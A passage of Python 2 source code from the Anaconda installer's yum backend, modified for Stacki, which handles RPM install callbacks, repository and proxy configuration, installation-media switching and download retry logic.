rpm.RPMCALLBACK_TRANS_STOP and self.progressWindow: self.progressWindow.pop() if what == rpm.RPMCALLBACK_INST_OPEN_FILE: (hdr, rpmloc) = h # hate hate hate at epochs... epoch = hdr['epoch'] if epoch is not None: epoch = str(epoch) txmbrs = self.ayum.tsInfo.matchNaevr(hdr['name'], hdr['arch'], epoch, hdr['version'], hdr['release']) if len(txmbrs) == 0: raise RuntimeError, "Unable to find package %s-%s-%s.%s" %(hdr['name'], hdr['version'], hdr['release'], hdr['arch']) po = txmbrs[0].po repo = self.repos.getRepo(po.repoid) pkgStr = "%s-%s-%s.%s" % (po.name, po.version, po.release, po.arch) s = to_unicode(_("<b>Installing %(pkgStr)s</b> (%(size)s)\n")) \ % {'pkgStr': pkgStr, 'size': size_string(hdr['size'])} summary = to_unicode(gettext.ldgettext("redhat-dist", hdr['summary'] or "")) s += summary.strip() self.progress.set_label(s) self.instLog.write(self.modeText % str(pkgStr)) self.instLog.flush() self.openfile = None # STACKI retries = 0 while self.openfile is None: try: fn = repo.getPackage(po) f = open(fn, 'r') self.openfile = f except (yum.Errors.NoMoreMirrorsRepoError, IOError): log.info("STACKI:getPackage:failed:retries (%d)" % retries) if retries > 10: self.ayum._handleFailure(po) else: retries += 1 continue except yum.Errors.RepoError, e: continue # STACKI trynumber = 0 while self.openfile is None: trynumber += 1 try: # checkfunc gets passed to yum's use of URLGrabber which # then calls it with the file being fetched. verifyPkg # makes sure the checksum matches the one in the metadata. # # From the URLGrab documents: # checkfunc=(function, ('arg1', 2), {'kwarg': 3}) # results in a callback like: # function(obj, 'arg1', 2, kwarg=3) # obj.filename = '/tmp/stuff' # obj.url = 'http://foo.com/stuff' checkfunc = (self.ayum.verifyPkg, (po, 1), {}) fn = repo.getPackage(po, checkfunc=checkfunc) f = open(fn, 'r') self.openfile = f except yum.Errors.NoMoreMirrorsRepoError: self.ayum._handleFailure(po, trynumber) except IOError: self.ayum._handleFailure(po, trynumber) except URLGrabError as e: log.error("URLGrabError: %s" % (e,)) self.ayum._handleFailure(po, trynumber) except yum.Errors.RepoError, e: continue self.inProgressPo = po return self.openfile.fileno() elif what == rpm.RPMCALLBACK_INST_CLOSE_FILE: if self.initWindow: self.initWindow.pop() self.initWindow = None (hdr, rpmloc) = h fn = self.openfile.name self.openfile.close() self.openfile = None if os.path.dirname(fn).startswith("%s/var/cache/yum/" % self.rootPath): try: os.unlink(fn) except OSError as e: log.debug("unable to remove file %s" %(e.strerror,)) self.donepkgs += 1 self.doneSize += self.inProgressPo.returnSimple("installedsize") / 1024.0 self.doneFiles += len(hdr[rpm.RPMTAG_BASENAMES]) if self.donepkgs <= self.numpkgs: self.progress.set_text(P_("Packages completed: " "%(donepkgs)d of %(numpkgs)d", "Packages completed: " "%(donepkgs)d of %(numpkgs)d", self.numpkgs) % {'donepkgs': self.donepkgs, 'numpkgs': self.numpkgs}) if self.totalSize > 0: self.progress.set_fraction(float(self.doneSize / self.totalSize)) else: self.progress.set_fraction(0.0) self.progress.processEvents() self.inProgressPo = None elif what in (rpm.RPMCALLBACK_UNINST_START, rpm.RPMCALLBACK_UNINST_STOP): if self.initWindow is None: self.initWindow = self.pulseWindow(_("Finishing upgrade"), _("Finishing upgrade process. This may take a little while."), 0, pulse=True) else: self.initWindow.pulse() elif what in (rpm.RPMCALLBACK_CPIO_ERROR, rpm.RPMCALLBACK_UNPACK_ERROR, rpm.RPMCALLBACK_SCRIPT_ERROR): if not isinstance(h, types.TupleType): h = (h, None) (hdr, rpmloc) = h # Script errors store whether or not they're fatal in "total". So, # we should only error out for fatal script errors or the cpio and # unpack problems. if what != rpm.RPMCALLBACK_SCRIPT_ERROR or total: self.messageWindow(_("Error Installing Package"), _("A fatal error occurred when installing the %s " "package. This could indicate errors when reading " "the installation media. Installation cannot " "continue.") % hdr, type="custom", custom_icon="error", custom_buttons=[_("_Exit installer")]) sys.exit(1) if self.initWindow is None: self.progress.processEvents() class AnacondaYumRepo(YumRepository): def __init__(self, *args, **kwargs): YumRepository.__init__(self, *args, **kwargs) self.enablegroups = True self.sslverify = True self._anacondaBaseURLs = [] self.proxy_url = None def needsNetwork(self): def _isURL(s): return s.startswith("http") or s.startswith("ftp") # STACKI file = open('/proc/cmdline', 'r') args = string.split(file.readline()) file.close() if 'build' in args: return False # STACKI if len(self.baseurl) > 0: return len(filter(lambda s: _isURL(s), self.baseurl)) > 0 elif self.mirrorlist: return _isURL(self.mirrorlist) else: return False def dirCleanup(self, upgrade=False): cachedir = self.getAttribute('cachedir') if os.path.isdir(cachedir): if upgrade: log.debug("Removing contents of %s" % (cachedir)) for f in filter(os.path.isfile, glob.glob("%s/*" % (cachedir))): try: os.unlink(f) except Exception, e: log.debug("error %s removing: %s" %(e,f)) elif not self.needsNetwork() or self.name == "Installation Repo" or self.id.startswith("anaconda-"): log.debug("Removing cachedir: %s" % (cachedir)) shutil.rmtree(cachedir) else: log.debug("Removing headers and packages from %s" % (cachedir)) if os.path.exists("%s/headers" % cachedir): shutil.rmtree("%s/headers" % cachedir) if os.path.exists("%s/packages" % cachedir): shutil.rmtree("%s/packages" % cachedir) # needed to store nfs: repo url that yum doesn't know def _getAnacondaBaseURLs(self): return self._anacondaBaseURLs or self.baseurl or [self.mirrorlist] def _setAnacondaBaseURLs(self, value): self._anacondaBaseURLs = value anacondaBaseURLs = property(_getAnacondaBaseURLs, _setAnacondaBaseURLs, doc="Extends AnacondaYum.baseurl to store non-yum urls:") class YumSorter(yum.YumBase): def _transactionDataFactory(self): return SplitMediaTransactionData() class AnacondaYum(YumSorter): def __init__(self, anaconda): YumSorter.__init__(self) self.anaconda = anaconda self._timestamp = None self.repoIDcounter = itertools.count() # Only needed for hard drive and nfsiso installs. self._discImages = {} self.isodir = None # Only needed for media installs. self.currentMedia = None self.mediagrabber = None self._loopdev_used = None # Where is the source media mounted? This is the directory # where Packages/ is located. self.tree = "/mnt/source" self.macros = {} if flags.selinux: for directory in ("/tmp/updates", "/etc/selinux/targeted/contexts/files", "/etc/security/selinux/src/policy/file_contexts", "/etc/security/selinux"): fn = "%s/file_contexts" %(directory,) if os.access(fn, os.R_OK): break self.macros["__file_context_path"] = fn else: self.macros["__file_context_path"] = "%{nil}" self.updates = [] self.localPackages = [] # Parse proxy values from anaconda self.proxy = None self.proxy_url = None self.proxy_username = None self.proxy_password = None if self.anaconda.proxy: self.setProxy(self.anaconda, self) def setup(self): # yum doesn't understand all our method URLs, so use this for all # except FTP and HTTP installs. self._baseRepoURL = "file://%s" % self.tree while True: try: self.configBaseURL() break except SystemError as exception: self.anaconda.methodstr = self.anaconda.intf.methodstrRepoWindow(self.anaconda.methodstr or "cdrom:", exception) self.doConfigSetup(root=self.anaconda.rootPath) if not self.anaconda.id.getUpgrade(): self.conf.installonlypkgs = [] def _switchCD(self, discnum): if os.access("%s/.discinfo" % self.tree, os.R_OK): f = open("%s/.discinfo" % self.tree) self._timestamp = f.readline().strip() f.close() dev = self.anaconda.id.storage.devicetree.getDeviceByName(self.anaconda.mediaDevice) dev.format.mountpoint = self.tree # If self.currentMedia is None, then there shouldn't be anything # mounted. Before going further, see if the correct disc is already # in the drive. This saves a useless eject and insert if the user # has for some reason already put the disc in the drive. if self.currentMedia is None: try: dev.format.mount() if verifyMedia(self.tree, discnum, None): self.currentMedia = discnum return dev.format.unmount() except: pass else: unmountCD(dev, self.anaconda.intf.messageWindow) self.currentMedia = None dev.eject() while True: if self.anaconda.intf: self.anaconda.intf.beep() self.anaconda.intf.messageWindow(_("Change Disc"), _("Please insert %(productName)s disc %(discnum)d to continue.") % {'productName': productName, 'discnum': discnum}) try: dev.format.mount() if verifyMedia(self.tree, discnum, self._timestamp): self.currentMedia = discnum break self.anaconda.intf.messageWindow(_("Wrong Disc"), _("That's not the correct %s disc.") % (productName,)) dev.format.unmount() dev.eject() except: self.anaconda.intf.messageWindow(_("Error"), _("Unable to access the disc.")) def _switchImage(self, discnum): umountImage(self.tree, self.currentMedia, self._loopdev_used) self.currentMedia = None # mountDirectory checks before doing anything, so it's safe to # call this repeatedly. mountDirectory(self.anaconda.methodstr, self.anaconda.intf.messageWindow) (self._loopdev_used, self._discImages) = mountImage(self.isodir, self.tree, discnum, self.anaconda.intf.messageWindow, discImages=self._discImages) self.currentMedia = discnum def configBaseURL(self): # We only have a methodstr if method= or repo= was passed to # anaconda. No source for this base repo (the CD media, NFS, # whatever) is mounted yet since loader only mounts the source # for the stage2 image. We need to set up the source mount # now. if flags.cmdline.has_key("preupgrade"): path = "/var/cache/yum/preupgrade" self.anaconda.methodstr = "hd::%s" % path self._baseRepoURL = "file:///mnt/sysimage/%s" % path elif self.anaconda.methodstr: m = self.anaconda.methodstr if m.startswith("hd:"): if m.count(":") == 2: (device, path) = m[3:].split(":") fstype = "auto" else: (device, fstype, path) = m[3:].split(":") # First check for an installable tree isys.mount(device, self.tree, fstype=fstype) if os.path.exists("%s/%s/repodata/repomd.xml" % (self.tree, path)): self._baseRepoURL = "file://%s/%s" % (self.tree, path) return isys.umount(self.tree, removeDir=False) # Look for .iso images self.isodir = "/mnt/isodir/%s" % path # This takes care of mounting /mnt/isodir first. self._switchImage(1) self.mediagrabber = self.mediaHandler elif m.startswith("nfsiso:"): self.isodir = "/mnt/isodir" # Calling _switchImage takes care of mounting /mnt/isodir first. if not network.hasActiveNetDev(): if not self.anaconda.intf.enableNetwork(): self._baseRepoURL = None return urlgrabber.grabber.reset_curl_obj() self._switchImage(1) self.mediagrabber = self.mediaHandler elif m.startswith("http") or m.startswith("ftp:"): self._baseRepoURL = m elif m.startswith("nfs:"): if not network.hasActiveNetDev(): if not self.anaconda.intf.enableNetwork(): self._baseRepoURL = None urlgrabber.grabber.reset_curl_obj() (opts, server, path) = iutil.parseNfsUrl(m) isys.mount(server+":"+path, self.tree, "nfs", options=opts) # This really should be fixed in loader instead but for now see # if there's images and if so go with this being an NFSISO # install instead. images = findIsoImages(self.tree, self.anaconda.intf.messageWindow) if images != {}: isys.umount(self.tree, removeDir=False) self.anaconda.methodstr = "nfsiso:%s" % m[4:] self.configBaseURL() return elif m.startswith("cdrom:"): self._switchCD(1) self.mediagrabber = self.mediaHandler self._baseRepoURL = "file://%s" % self.tree else: # No methodstr was given. In order to find an installation source, # we should first check to see if there's a CD/DVD with packages # on it, and then default to the mirrorlist URL. The user can # always change the repo with the repo editor later. cdr = scanForMedia(self.tree, self.anaconda.id.storage) if cdr: self.mediagrabber = self.mediaHandler self.anaconda.mediaDevice = cdr self.currentMedia = 1 log.info("found installation media on %s" % cdr) else: # No CD with media on it and no repo=/method= parameter, so # default to using whatever's enabled in /etc/yum.repos.d/ self._baseRepoURL = None def configBaseRepo(self, root='/'): # Create the "base" repo object, assuming there is one. Otherwise we # just skip all this and use the defaults from /etc/yum.repos.d. if not self._baseRepoURL: return # add default repos anacondabaseurl = (self.anaconda.methodstr or "cdrom:%s" % (self.anaconda.mediaDevice)) anacondabasepaths = self.anaconda.id.instClass.getPackagePaths(anacondabaseurl) for (name, uri) in self.anaconda.id.instClass.getPackagePaths(self._baseRepoURL).items(): rid = name.replace(" ", "") repo = AnacondaYumRepo("anaconda-%s-%s" % (rid, productStamp)) repo.baseurl = uri repo.anacondaBaseURLs = anacondabasepaths[name] repo.name = name repo.cost = 100 if self.anaconda.mediaDevice or self.isodir: repo.mediaid = getMediaId(self.tree) log.info("set mediaid of repo %s to: %s" % (rid, repo.mediaid)) if self.anaconda.proxy: self.setProxy(self.anaconda, repo) if flags.noverifyssl: repo.sslverify = False repo.enable() self.repos.add(repo) def mediaHandler(self, *args, **kwargs): mediaid = kwargs["mediaid"] discnum = kwargs["discnum"] relative = kwargs["relative"] # The package exists on media other than what's mounted right now. if discnum != self.currentMedia: log.info("switching from media #%s to #%s for %s" % (self.currentMedia, discnum, relative)) # Unmount any currently mounted ISO images and mount the one # containing the requested packages. if self.isodir: self._switchImage(discnum) else: self._switchCD(discnum) ug = URLGrabber(checkfunc=kwargs["checkfunc"]) ug.urlgrab("%s/%s" % (self.tree, kwargs["relative"]), kwargs["local"], text=kwargs["text"], range=kwargs["range"], copy_local=1) return kwargs["local"] # XXX: This is straight out of yum, but we need to override it here in # order to use our own repo class. def readRepoConfig(self, parser, section): '''Parse an INI file section for a repository. @param parser: ConfParser or similar to read INI file values from. @param section: INI file section to read. @return: YumRepository instance. ''' repo = AnacondaYumRepo(section) repo.populate(parser, section, self.conf) # Ensure that the repo name is set if not repo.name: repo.name = section self.logger.error(_('Repository %r is missing name in configuration, ' 'using id') % section) # Set attributes not from the config file repo.yumvar.update(self.conf.yumvar) repo.cfg = parser if "-source" in repo.id or "-debuginfo" in repo.id: name = repo.name del(repo) raise RepoError, "Repo %s contains -source or -debuginfo, excluding" % name # this is a little hard-coded, but it's effective if productIsFinal and ("rawhide" in repo.id or "development" in repo.id): name = repo.name del(repo) raise RepoError, "Excluding devel repo %s for non-devel anaconda" % name if not productIsFinal and not repo.enabled: name = repo.name del(repo) raise RepoError, "Excluding disabled repo %s for prerelease" % name # If repo=/method= was passed in, we want to default these extra # repos to off. if self._baseRepoURL: repo.enabled = False return repo def setProxy(self, src, dest): """ Set the proxy settings from a string in src.proxy If the string includes un/pw use those, otherwise set the un/pw from src.proxyUsername and src.proxyPassword dest has dest.proxy set to the host and port (no un/pw) dest.proxy_username and dest.proxy_password are set if present in src """ # This is the same pattern as from loader/urls.c:splitProxyParam # except that the POSIX classes have been replaced with character # ranges # NOTE: If this changes, update tests/regex/proxy.py # # proxy=[protocol://][username[:password]@]host[:port][path] pattern = re.compile("([A-Za-z]+://)?(([A-Za-z0-9]+)(:[^:@]+)?@)?([^:/]+)(:[0-9]+)?(/.*)?") m = pattern.match(src.proxy) if m and m.group(3): dest.proxy_username = m.group(3) elif getattr(src, "proxyUsername", None): dest.proxy_username = src.proxyUsername if m and m.group(4): # Skip the leading colon. dest.proxy_password = m.group(4)[1:] elif getattr(src, "proxyPassword", None): dest.proxy_password = src.proxyPassword if dest.proxy_username or dest.proxy_password: proxy_auth = "%s:%s@" % (dest.proxy_username or '', dest.proxy_password or '') else: proxy_auth = "" if m and m.group(5): # If both a host and port was found, just paste them # together using the colon at the beginning of the port # match as a separator. Otherwise, just use the host. if m.group(6): proxy = m.group(5) + m.group(6) else: proxy = m.group(5) # yum also requires a protocol. If none was given, # default to http. if m.group(1): dest.proxy_url = m.group(1) + proxy_auth + proxy proxy = m.group(1) + proxy else: dest.proxy_url = "http://" + proxy_auth + proxy proxy = "http://" + proxy # Set the repo proxy. NOTE: yum immediately parses this and # raises an error if it isn't correct dest.proxy = proxy def _getAddons(self, repo): """ Check the baseurl or mirrorlist for a repository, see if it has any valid addon repos and if so, return a list of (repo name, repo URL). """ baseurl = repo.mirrorlist or repo.baseurl[0] retval = [] c = ConfigParser() # If there's no .treeinfo for this repo, don't bother looking for addons. treeinfo = self._getTreeinfo(baseurl, repo.proxy_url, repo.sslverify) if not treeinfo: return retval # We need to know which variant is being installed so we know what addons # are valid options. try: ConfigParser.read(c, treeinfo) variant = c.get("general", "variant") except: return retval section = "variant-%s" % variant if c.has_section(section) and c.has_option(section, "addons"): validAddons = c.get(section, "addons").split(",") else: return retval for addon in validAddons: addonSection = "addon-%s" % addon if not c.has_section(addonSection) or not c.has_option(addonSection, "repository"): continue url = "%s/%s" % (baseurl, c.get(addonSection, "repository")) retval.append((addon, c.get(addonSection, "name"), url)) return retval def _getTreeinfo(self, baseurl, proxy_url, sslverify): """ Try to get .treeinfo file from baseurl, optionally using proxy_url Saves the file into /tmp/.treeinfo """ if not baseurl: return None if baseurl.startswith("http") or baseurl.startswith("ftp"): if not network.hasActiveNetDev(): if not self.anaconda.intf.enableNetwork(): log.error("Error downloading %s/.treeinfo: network enablement failed" % (baseurl)) return None urlgrabber.grabber.reset_curl_obj() ug = URLGrabber() ugopts = { "ssl_verify_peer" : sslverify, "ssl_verify_host" : sslverify } if proxy_url and proxy_url.startswith("http"): proxies = { 'http' : proxy_url, 'https' : proxy_url } elif proxy_url and proxy_url.startswith("ftp"): proxies = { 'ftp' : proxy_url } else: proxies = {} try: ug.urlgrab("%s/.treeinfo" % baseurl, "/tmp/.treeinfo", copy_local=1, proxies=proxies, **ugopts) except Exception as e: try: ug.urlgrab("%s/treeinfo" % baseurl, "/tmp/.treeinfo", copy_local=1, proxies=proxies) except Exception as e: log.error("Error downloading treeinfo file: %s" % e) return None return "/tmp/.treeinfo" def _getReleasever(self): """ We need to make sure $releasever gets set up before .repo files are read. Since there's no redhat-release package in /mnt/sysimage (and won't be for quite a while), we need to do our own substutition. """ c = ConfigParser() treeinfo = self._getTreeinfo(self._baseRepoURL, self.proxy_url, not flags.noverifyssl) if not treeinfo: return productVersion ConfigParser.read(c, treeinfo) try: return c.get("general", "version") except: return productVersion # Override this method so yum doesn't nuke our existing logging config. def doLoggingSetup(self, *args, **kwargs): import yum.logginglevels file_handler = logging.FileHandler("/tmp/yum.log") file_formatter = logging.Formatter("[%(asctime)s] %(levelname)-8s: %(message)s") file_handler.setFormatter(file_formatter) tty3_handler = logging.FileHandler("/dev/tty3") tty3_formatter = logging.Formatter("%(asctime)s %(levelname)-8s: %(name)s: %(message)s", "%H:%M:%S") tty3_handler.setFormatter(tty3_formatter) verbose = logging.getLogger("yum.verbose") verbose.setLevel(logging.DEBUG) verbose.propagate = False verbose.addHandler(file_handler) logger = logging.getLogger("yum") logger.propagate = False logger.setLevel(yum.logginglevels.DEBUG_4) logger.addHandler(file_handler) anaconda_log.autoSetLevel(tty3_handler, True) tty3_handler.setLevel(anaconda_log.logger.loglevel) logger.addHandler(tty3_handler) # XXX filelogger is set in setFileLog - do we or user want it? filelogger = logging.getLogger("yum.filelogging") filelogger.setLevel(logging.INFO) filelogger.propagate = False def doConfigSetup(self, fn='/tmp/anaconda-yum.conf', root='/'): if hasattr(self, "preconf"): self.preconf.fn = fn self.preconf.root = root self.preconf.releasever = self._getReleasever() self.preconf.enabled_plugins = ["whiteout", "blacklist", "pidplugin"] YumSorter._getConfig(self) else: YumSorter._getConfig(self, fn=fn, root=root, enabled_plugins=["whiteout", "blacklist", "pidplugin"]) self.configBaseRepo(root=root) mediaAddons = [] extraRepos = [] ddArch = os.uname()[4] #Add the Driver disc repos to Yum for d in glob.glob(DD_RPMS): dirname = os.path.basename(d) rid = "anaconda-%s" % dirname repo = AnacondaYumRepo(rid) repo.baseurl = [ "file://%s" % d ] repo.name = "Driver Disk %s" % dirname.split("-")[1] repo.enable() extraRepos.append(repo) if self.anaconda.isKickstart: for ksrepo in self.anaconda.id.ksdata.repo.repoList: if ksrepo.baseurl == "file://anaconda-addon": mediaAddons.append(ksrepo.name) continue anacondaBaseURLs = [ksrepo.baseurl] # yum doesn't understand nfs:// and doesn't want to. We need # to first do the mount, then translate it into a file:// that # yum does understand. # "nfs:" and "nfs://" prefixes are accepted in ks repo --baseurl if ksrepo.baseurl and ksrepo.baseurl.startswith("nfs:"): dest = tempfile.mkdtemp("", ksrepo.name.replace(" ", ""), "/mnt") # handle "nfs://" prefix if ksrepo.baseurl[4:6] == '//': ksrepo.baseurl = ksrepo.baseurl.replace('//', '', 1) anacondaBaseURLs = [ksrepo.baseurl] try: isys.mount(ksrepo.baseurl[4:], dest, "nfs") except Exception as e: log.error("error mounting NFS repo: %s" % e) ksrepo.baseurl = "file://%s" % dest repo = AnacondaYumRepo(ksrepo.name) repo.mirrorlist = ksrepo.mirrorlist repo.name = ksrepo.name if not ksrepo.baseurl: repo.baseurl = [] else: repo.baseurl = [ ksrepo.baseurl ] repo.anacondaBaseURLs = anacondaBaseURLs if ksrepo.cost: repo.cost = ksrepo.cost if ksrepo.excludepkgs: repo.exclude = ksrepo.excludepkgs if ksrepo.includepkgs: repo.includepkgs = ksrepo.includepkgs if ksrepo.noverifyssl: repo.sslverify = False if ksrepo.proxy: self.setProxy(ksrepo, repo) elif self.anaconda.proxy: log.debug("%s will use the global proxy configuration", repo.name) self.setProxy(self.anaconda, repo) repo.enable() extraRepos.append(repo) initialRepos = self.repos.repos.values() + extraRepos for repo in initialRepos: addons = self._getAddons(repo) for addon in addons: addonRepo = AnacondaYumRepo(addon[0]) addonRepo.name = addon[1] addonRepo.baseurl = [ addon[2] ] if self.anaconda.proxy: self.setProxy(self.anaconda, addonRepo) extraRepos.append(addonRepo) for repo in extraRepos: try: self.repos.add(repo) log.info("added repository %s with URL %s" % (repo.name, repo.mirrorlist or repo.baseurl[0])) if repo.name in mediaAddons: repo.enable() except: log.warning("ignoring duplicate repository %s with URL %s" % (repo.name, repo.mirrorlist or repo.baseurl[0])) self.repos.setCacheDir(self.conf.cachedir) # When upgrading cleanup the yum cache and enable the addons # This has to be called after setCacheDir if self.anaconda.id.getUpgrade(): for repo in extraRepos: repo.dirCleanup(upgrade=True) repo.enable() log.info("enabled %s for upgrade" % (repo.name)) if os.path.exists("%s/boot/upgrade/install.img" % self.anaconda.rootPath): log.info("REMOVING stage2 image from %s /boot/upgrade" % self.anaconda.rootPath ) try: os.unlink("%s/boot/upgrade/install.img" % self.anaconda.rootPath) except: log.warning("failed to clean /boot/upgrade") def downloadHeader(self, po): trynumber = 0 while True: # retrying version of download header trynumber += 1 try: YumSorter.downloadHeader(self, po) break except yum.Errors.NoMoreMirrorsRepoError: self._handleFailure(po, trynumber) except IOError: self._handleFailure(po, trynumber) except yum.Errors.RepoError, e: continue def _handleFailure(self, package, trynumber=YUM_DOWNLOAD_RETRIES): if not self.isodir and self.currentMedia: buttons = [_("Re_boot"), _("_Eject")] else: buttons = [_("Re_boot"), _("_Retry")] pkgFile = to_unicode(os.path.basename(package.remote_path)) if package.repo.needsNetwork() and not network.hasActiveNetDev(): if not self.anaconda.intf.enableNetwork(): return urlgrabber.grabber.reset_curl_obj() # only show the retry window after 3 tries if trynumber < YUM_DOWNLOAD_RETRIES: log.warning('package download failure, retrying automatically') time.sleep(YUM_DOWNLOAD_DELAY * trynumber) rc = 1 else: rc = self.anaconda.intf.messageWindow(_("Error"), _("The file %s cannot be opened. This is due to a missing " "file, a corrupt package or corrupt media. Please " "verify your installation source.\n\n" "If you exit, your system will be left in an inconsistent " "state that will likely require reinstallation.\n\n") % (pkgFile,), type="custom", custom_icon="error", custom_buttons=buttons) if rc == 0: sys.exit(0) else: if os.path.exists(package.localPkg()): os.unlink(package.localPkg()) if not self.isodir and self.currentMedia: self._switchCD(self.currentMedia) else: return def mirrorFailureCB (self, obj, *args, **kwargs): # STACKI # # everytime we hit this method, increase the timeout # repo = self.repos.getRepo(kwargs["repo"]) log.info("STACKI:mirrorFailureCB: sleeping for %s seconds" % repo.timeout) time.sleep(repo.timeout) repo.timeout += 10.0 # # the call to _setupGrab() makes yum reread its options, thus, it will # update the timeout # repo._setupGrab() return # STACKI # This gets called when a mirror fails, but it cannot know whether # or not there are other mirrors left to try, since it cannot know # which mirror we were on when we started this particular download. # Whenever we have run out of mirrors the grabber's get/open/retrieve # method will raise a URLGrabError exception with errno 256. grab = self.repos.getRepo(kwargs["repo"]).grab log.warning("Failed to get %s from mirror %d/%d, " "or downloaded file is corrupt" % (obj.url, grab._next + 1, len(grab.mirrors))) if self.currentMedia: dev = self.anaconda.id.storage.devicetree.getDeviceByName(self.anaconda.mediaDevice) dev.format.mountpoint = self.tree unmountCD(dev, self.anaconda.intf.messageWindow) self.currentMedia = None def urlgrabberFailureCB (self, obj, *args, **kwargs): if hasattr(obj, "exception"): log.warning("Try %s/%s for %s failed: %s" % (obj.tries, obj.retry, obj.url, obj.exception)) else: log.warning("Try %s/%s for %s failed" % (obj.tries, obj.retry, obj.url)) if obj.tries == obj.retry: return delay = 0.25*(2**(obj.tries-1)) if delay > 1: w = self.anaconda.intf.waitWindow(_("Retrying"), _("Retrying download.")) time.sleep(delay) w.pop() else: time.sleep(delay) def getDownloadPkgs(self): downloadpkgs = [] totalSize = 0 totalFiles = 0 for txmbr in self.tsInfo.getMembersWithState(output_states=TS_INSTALL_STATES): if txmbr.po: totalSize += int(txmbr.po.returnSimple("installedsize")) / 1024 for filetype in txmbr.po.returnFileTypes(): totalFiles += len(txmbr.po.returnFileEntries(ftype=filetype)) downloadpkgs.append(txmbr.po) return (downloadpkgs, totalSize, totalFiles) def setColor(self): if rpmUtils.arch.isMultiLibArch(): self.ts.ts.setColor(3) def run(self, instLog, cb, intf, id): def mediasort(a, b): # sort so that first CD comes first, etc. -99 is a magic number # to tell us that the cd should be last if a == -99: return 1 elif b == -99: return -1 if a < b: return -1 elif a > b: return 1 return 0 self.initActionTs() if id.getUpgrade(): self.ts.ts.setProbFilter(~rpm.RPMPROB_FILTER_DISKSPACE) # STACKI self.ts.ts.setProbFilter(rpm.RPMPROB_FILTER_REPLACEOLDFILES | rpm.RPMPROB_FILTER_REPLACENEWFILES) # STACKI self.setColor() # If we don't have any required media assume single disc if self.tsInfo.reqmedia == {}: self.tsInfo.reqmedia[0] = None mkeys = self.tsInfo.reqmedia.keys() mkeys.sort(mediasort) if os.path.ismount("/mnt/stage2"): isys.umount("/mnt/stage2") for i in mkeys: self.tsInfo.curmedia = i if i > 0: pkgtup = self.tsInfo.reqmedia[i][0] try: self.dsCallback = DownloadHeaderProgress(intf, self) self.populateTs(keepold=0) self.dsCallback.pop() self.dsCallback = None except RepoError, e: msg = _("There was an error running your transaction for " "the following reason: %s\n") % str(e) if self.anaconda.id.upgrade or self.anaconda.isKickstart: rc = intf.messageWindow(_("Error"), msg, type="custom", custom_icon="error", custom_buttons=[_("_Exit installer")]) sys.exit(1) else: rc = intf.messageWindow(_("Error"), msg, type="custom", custom_icon="error", custom_buttons=[_("_Back"), _("_Exit installer")]) if rc == 1: sys.exit(1) else: self.tsInfo.curmedia = None return DISPATCH_BACK self.ts.check() self.ts.order() self.anaconda.id.bootloader.trusted_boot = self.isPackageInstalled(name="tboot") and not iutil.inXen() if self._run(instLog, cb, intf) == DISPATCH_BACK: self.tsInfo.curmedia = None return DISPATCH_BACK self.ts.close() def _run(self, instLog, cb, intf): # set log fd. FIXME: this is ugly. see changelog entry from 2005-09-13 self.ts.ts.scriptFd = instLog.fileno() rpm.setLogFile(instLog) uniqueProbs = {} spaceneeded = {} spaceprob = "" fileConflicts = [] fileprob = "" try: self.runTransaction(cb=cb) except YumBaseError, probs: # FIXME: we need to actually look at these problems... probTypes = { rpm.RPMPROB_NEW_FILE_CONFLICT : _('file conflicts'), rpm.RPMPROB_FILE_CONFLICT : _('file conflicts'), rpm.RPMPROB_OLDPACKAGE: _('older package(s)'), rpm.RPMPROB_DISKSPACE: _('insufficient disk space'), rpm.RPMPROB_DISKNODES: _('insufficient disk inodes'), rpm.RPMPROB_CONFLICT: _('package conflicts'), rpm.RPMPROB_PKG_INSTALLED: _('package already installed'), rpm.RPMPROB_REQUIRES: _('required package'), rpm.RPMPROB_BADARCH: _('package for incorrect arch'), rpm.RPMPROB_BADOS: _('package for incorrect os'), } for (descr, (ty, mount, need)) in probs.value: # FIXME: probs.value??? log.error("%s: %s" %(probTypes[ty], descr)) if not uniqueProbs.has_key(ty) and probTypes.has_key(ty): uniqueProbs[ty] = probTypes[ty] if ty == rpm.RPMPROB_DISKSPACE: spaceneeded[mount] = need elif ty in [rpm.RPMPROB_NEW_FILE_CONFLICT, rpm.RPMPROB_FILE_CONFLICT]: fileConflicts.append(descr) if spaceneeded: spaceprob = _("You need more space on the following " "file systems:\n") for (mount, need) in spaceneeded.items(): log.info("(%s, %s)" %(mount, need)) if mount.startswith("/mnt/sysimage/"): mount.replace("/mnt/sysimage", "") elif mount.startswith("/mnt/sysimage"): mount = "/" + mount.replace("/mnt/sysimage", "") spaceprob += "%d M on %s\n" % (need / (1024*1024), mount) elif fileConflicts: fileprob = _("There were file conflicts when checking the " "packages to be installed:\n%s\n") % ("\n".join(fileConflicts),) msg = _("There was an error running your transaction for " "the following reason(s): %s.\n") % ', '.join(uniqueProbs.values()) spaceprob = to_unicode(spaceprob) fileprob = to_unicode(fileprob) if len(self.anaconda.backend.getRequiredMedia()) > 1 or \ self.anaconda.id.upgrade or self.anaconda.isKickstart: intf.detailedMessageWindow(_("Error Running Transaction"), msg, spaceprob + "\n" + fileprob, type="custom", custom_icon="error", custom_buttons=[_("_Exit installer")]) sys.exit(1) else: rc = intf.detailedMessageWindow(_("Error Running Transaction"), msg, spaceprob + "\n" + fileprob, type="custom", custom_icon="error", custom_buttons=[_("_Back"), _("_Exit installer")]) if rc == 1: sys.exit(1) else: self._undoDepInstalls() return DISPATCH_BACK def doMacros(self): for (key, val) in self.macros.items(): rpm.addMacro(key, val) def simpleDBInstalled(self, name, arch=None): # FIXME: doing this directly instead of using self.rpmdb.installed() # speeds things up by 400% mi = self.ts.ts.dbMatch('name', name) if mi.count() == 0: return False if arch is None: return True if arch in map(lambda h: h['arch'], mi): return True return False def isPackageInstalled(self, name = None, epoch = None, version = None, release = None, arch = None, po = None): # FIXME: this sucks. we should probably suck it into yum proper # but it'll need a bit of cleanup first. if po is not None: (name, epoch, version, release, arch) = po.returnNevraTuple() installed = False if name and not (epoch or version or release or arch): installed = self.simpleDBInstalled(name) elif self.rpmdb.installed(name = name, epoch = epoch, ver = version, rel = release, arch = arch): installed = True lst = self.tsInfo.matchNaevr(name = name, epoch = epoch, ver = version, rel = release, arch = arch) for txmbr in lst: if txmbr.output_state in TS_INSTALL_STATES: return True if installed and len(lst) > 0: # if we get here, then it was installed, but it's in the tsInfo # for an erase or obsoleted --> not going to be installed at end return False return installed def isGroupInstalled(self, grp): if grp.selected: return True elif grp.installed and not grp.toremove: return True return False def _pkgExists(self, pkg): """Whether or not a given package exists in our universe.""" try: pkgs = self.pkgSack.returnNewestByName(pkg) return True except yum.Errors.PackageSackError: pass try: pkgs = 